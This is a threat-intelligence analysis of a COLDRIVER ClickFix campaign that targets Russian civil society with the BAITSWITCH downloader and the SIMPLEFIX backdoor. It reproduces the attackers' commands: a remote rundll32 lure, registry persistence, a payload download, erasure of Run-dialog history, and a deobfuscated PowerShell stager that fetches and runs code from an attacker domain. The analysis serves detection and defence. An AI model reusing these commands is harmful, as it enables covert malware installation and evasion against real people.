COLDRIVER Updates Arsenal with BAITSWITCH and SIMPLEFIX

Introduction

In September 2025, Zscaler ThreatLabz discovered a new multi-stage ClickFix campaign potentially targeting members of Russian civil society. Based on multiple overlapping tactics, techniques and procedures (TTPs), ThreatLabz attributes this campaign with moderate confidence to the Russia-linked advanced persistent threat (APT) group, COLDRIVER. COLDRIVER (also known as Star Blizzard, Callisto, and UNC4057) is a group known to leverage social-engineering techniques to target NGOs, think tanks, journalists, and human rights defenders, both in Western countries and in Russia. Historically, their primary attack vector is credential phishing. However, beginning in 2025, COLDRIVER added the ClickFix technique to their arsenal.

This blog provides a detailed technical analysis of the infection chain leading to the deployment of an undocumented downloader that we dubbed BAITSWITCH and a new PowerShell-based backdoor that we named SIMPLEFIX.

Key Takeaways

• In September 2025, ThreatLabz discovered a multi-stage ClickFix campaign that is likely affiliated with the nation-state threat group known as COLDRIVER.
• COLDRIVER is a Russia-linked APT group that has mainly targeted dissidents and their supporters through phishing campaigns.
• ThreatLabz discovered two new lightweight malware families used by the group: a downloader that we named BAITSWITCH, and a PowerShell backdoor that we named SIMPLEFIX.
• The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced.
• COLDRIVER remains active in targeting members of civil society, both in the Western regions and Russia.
• COLDRIVER employs server-side checks to selectively deliver malicious code based on the user-agent and characteristics of the infected machine.

Technical Analysis

In this section, a detailed analysis is provided for each component of the attack chain initiated when a victim visits a ClickFix webpage and performs the actions prompted by the site. The figure below provides an overview of the multi-stage attack chain.

Figure 1: Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver SIMPLEFIX.

ClickFix / CAPTCHA verification

The infection chain begins with a webpage masquerading as an information resource addressing challenges faced by members of civil society and think tanks in Russia. This webpage employs the ClickFix social-engineering attack method to trick users into executing a malicious command in the Windows Run dialog box by displaying a fake Cloudflare Turnstile checkbox, as shown in the figure below. 

Figure 2: Fake Cloudflare Turnstile checkbox.

When the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box. This action executes machinerie.dll (BAITSWITCH) via rundll32.exe, invoking its verifyme export function. While this UI is displayed, the JavaScript code waits for a set timeout before redirecting the victim to a decoy document hosted on Google Drive, created by the threat-actor controlled account narnobudaeva@gmail[.]com. The figure below shows the contents of this decoy document.

Figure 3: Example of a ClickFix social-engineering decoy document hosted on Google Drive.

This two-page decoy document describes efforts to build resilience for exiled members of Russian civil society, such as human rights defenders, journalists, educators, and civic activists, through mentorship and fellowship programs.

BAITSWITCH downloader DLL

BAITSWITCH (Machinerie.dll) is a downloader that establishes persistence and retrieves stager payloads to execute the SIMPLEFIX backdoor. It connects to URLs using a hardcoded user-agent string (Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) to receive and execute commands. The command-and-control (C2) server responds with commands only when this specific user-agent string is used, returning a “404 Not Found” page otherwise.

BAITSWITCH makes five HTTP requests to the threat actor-controlled domain captchanom[.]top to receive various commands and download the PowerShell-based SIMPLEFIX backdoor. For each response from the C2 server, BAITSWITCH uses the lpCommandLine parameter of CreateProcessA to execute the command on the endpoint. Below is the sequence of requests made:

1. The first request to the URL hxxps://captchanom[.]top/coup/premier retrieves a command to establish persistence. This command executes the reg executable, configuring the UserInitMprLogonScript registry key to run a PowerShell script (downloaded later) with a specific argument at the next user logon. Below is the command received:

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f%

2. The second request to the URL hxxps://captchanom[.]top/coup/deuxieme retrieves a command to store encrypted payloads in the Windows registry. The received command executes PowerShell to add a Base64-encoded, AES-encrypted PowerShell script (stored in $ii) and a Base64-encoded AES decryption key (stored in $iii) to the Windows registry keys EnthusiastMod and QatItems, respectively. This encrypted script will be decrypted and executed in subsequent stages. Below is the command received:

powershell -c "$ii = 'kXvyDMF+...iL54E0QbEXJyRA==';$iii = 'yuClT3Iwhv9SERwcmKipg=';$rrr = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon';if (-not (Test-Path $rrr)) {New-Item -Path $rrr -Force};try {$rrrr = [System.Text.Encoding]::UTF8.GetBytes($ii);Set-ItemProperty -Path $rrr -Name "EnthusiastMode" -Value $rrrr -Type Binary;$rrrrr = [System.Text.Encoding]::UTF8.GetBytes($iii);Set-ItemProperty -Path $rrr -Name "QatItems" -Value $rrrrr -Type Binary;}catch {}"

3. In the third request to the URL hxxps://captchanom[.]top/coup/troisieme, BAITSWITCH downloads a PowerShell stager from a different server (southprovesolutions[.]com/FvFLcsr23) and saves it to the path %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1, referenced earlier in the persistence setup. Below is the command received:

powershell -c "Invoke-WebRequest -Uri \"hxxps://southprovesolutions[.]com/FvFLcsr23\" -OutFile \"$Env:APPDATA\Microsoft\Windows\FvFLcsr23.ps1\""

4. The fourth request to the URL hxxps://captchanom[.]top/coup/quatre retrieves a command to clear the RunMRU registry key. The RunMRU key stores the Most Recently Used (MRU) commands entered into the Run dialog (Win + R). Since the ClickFix attack begins with the user pasting the malicious command into "Win + R," this action effectively erases any trace of the attack. Below is the command received:

reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

5. In the fifth and final request to the URL hxxps://captchanom[.]top/, BAITSWITCH sends the victim’s hostname to the C2, possibly to register the victim with the C2 server. No response was observed from this URL.

PowerShell stager

On the next Windows logon, the PowerShell stager executes with the command-line parameter 7eHgxjgbBs3gHdkgx9AsRC, as specified in the logon script registry key. 

This script uses basic string obfuscation techniques:

• Multiple Base64-encoded strings are decoded, transformed, and concatenated to construct the decoded PowerShell script.
• After decoding, each Base64-encoded string undergoes the following transformations:
  • Replace all newline characters with semicolon characters.
  • Delete all non-ASCII characters ([^\x20-\x7E]).
  • Delete all 2-byte hex-encoded characters ((?i)x[0-9A-Fa-f]{4}).

Below is the deobfuscated PowerShell-based stager.

function WWW($value) {
   $scriptBlock = [scriptblock]::Create($value); & $scriptBlock
};
function WWWWW {
   param([string] $eeee, [string] $eeeee);
   try {
       $eee = [Convert]::FromBase64String($eeee);
       $eeeeee = $eee[0. .15];
       $eeeeeee = $eee[16..($eee.Length - 1)];
       $e = [System.Security.Cryptography.Aes]::Create();
       $e.Key = [Convert]::FromBase64String($eeeee);
       $e.IV = $eeeeee;
       $ee = $e.CreateDecryptor();
       $eeeeeeee = $ee.TransformFinalBlock($eeeeeee, 0, $eeeeeee.Length);
       return [Text.Encoding]::UTF8.GetString($eeeeeeee);
   } finally {
       if ($e) {
           $e.Dispose()
       }
   }
};
$wwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'EnthusiastMode';
$wwwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'QatItems';
$key = $global: wwww + [System.Text.Encoding]::UTF8.GetString($wwwwwww);
$wwwwwwww = [System.Text.Encoding]::UTF8.GetString($wwwwww);
$w = WWWWW $wwwwwwww $key;
WWW - value $w;

The stager has the following functionality:

• Reads the Base64-encoded and AES-encrypted PowerShell script from HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\EnthusiastMode.
• Reads a string from HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\QatItems.
• Concatenates the command-line parameter and the string from the registry to form the full Base64-encoded AES key: 7eHgxjgbBs3gHdkgx9AsRCyuClT3Iwhv9SERwcmKipg=.
• The PowerShell script is decrypted using the first 16 bytes of the Base64-decoded blob as the initialization vector (IV) and a 32-byte decryption key. Below is the resulting decrypted script.

$ia = @("southprovesolutions.com");
$fff = $false;
while (-not $fff) {
   foreach ($iii in $ia) {
       if ((Invoke-WebRequest -Uri "https://$iii/" -UseBasicParsing -Method Head -TimeoutSec 5 -ErrorAction SilentlyContinue) -ne $null) {
           $wc=New-Object System.Net.WebClient;
           Invoke-Command -ScriptBlock ([scriptblock]::Create($wc.DownloadString("https://$iii/Zxdf")));
           $fff = $true;
           break;
       }
       else {}
   };
   if (-not $fff) {
       Start-Sleep -Seconds 5;
   }
};

• This decrypted PowerShell script fetches the SIMPLEFIX backdoor from the URL hxxps://southprovesolutions[.]com/Zxdf.

SIMPLEFIX backdoor

SIMPLEFIX employs obfuscation techniques similar to those employed in the stager PowerShell script. The resulting deobfuscated script is available in the ThreatLabz GitHub repository.

The script enters a loop to execute the following steps every 3 minutes:

• Generate a user-agent string by combining the computer name, username, and the machine’s UUID (retrieved using WMI). This user-agent string is used for all communications with the C2 server.
• Send a request to hxxps://southprovesolutions[.]com/KZouoRc and parse the response for commands to execute.
• After each command is successfully executed, an HTTP request is sent to hxxps://southprovesolutions[.]com/VUkXugsYgu, likely to notify the C2 server of the successful command execution.

SIMPLEFIX supports the commands outlined in the table below:

Table 1: Commands supported by SIMPLEFIX.

At the time of analysis, the commands in the following table were received:

Table 2: ThreatLabz observed these commands being sent to the SIMPLEFIX backdoor.

Threat Attribution

ThreatLabz attributes this campaign to the Russia-linked APT group, COLDRIVER, with moderate confidence based on the code, victimology, and TTP overlaps outlined below.

• While the ClickFix social engineering technique is not unique to COLDRIVER APT group, they incorporated this technique into their arsenal in January 2025.
• The ClickFix HTML page contains multiple similarities with the HTML page used by COLDRIVER in their January 2025 campaign.
• The VBScript malware, LOSTKEYS, used by COLDRIVER in their January 2025 campaign, was decrypted using decryption keys split into two halves and delivered via two methods. One key was embedded in the staging script and the other was passed as a command-line parameter. ThreatLabz observed this same method used to deliver the decryption keys for the SIMPLEFIX PowerShell backdoor.
• The reconnaissance phase, which collects information about files on the target's endpoint, iterates over a pre-configured list of directories and file extensions. This approach closely resembles the PowerShell script block delivered to SIMPLEFIX as command ID 2.
• The COLDRIVER APT group is known for targeting members of NGOs, human right defenders, think tanks in Western regions, as well as individuals exiled from and residing in Russia. The focus of this campaign closely aligns with their victimology, which targets members of civil society connected to Russia.

Conclusion

This campaign by the Russia-linked group COLDRIVER targeted dissidents and their supporters using a ClickFix technique, which resulted in the deployment of BAITSWITCH and SIMPLEFIX. This highlights that ClickFix-style attacks and lightweight malware remain effective tools for threat actors. Basic cybersecurity practices, like enforcing least privilege access and using tools such as Windows AppLocker or App Control to block scripts and binaries, continue to be effective defenses against these types of threats. Additionally, technologies like Zscaler Browser Isolation can help mitigate clipboard interactions and user actions on untrusted websites, adding another layer of protection.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to COLDRIVER at various levels with the following threat names:

• Win64.Downloader.BAITSWITCH
• PS.Backdoor.SIMPLEFIX
• HTML.Phish.COLDRIVER

Indicators Of Compromise (IOCs)

Network-based indicators
 

Host-based indicators
 

MITRE ATT&CK Framework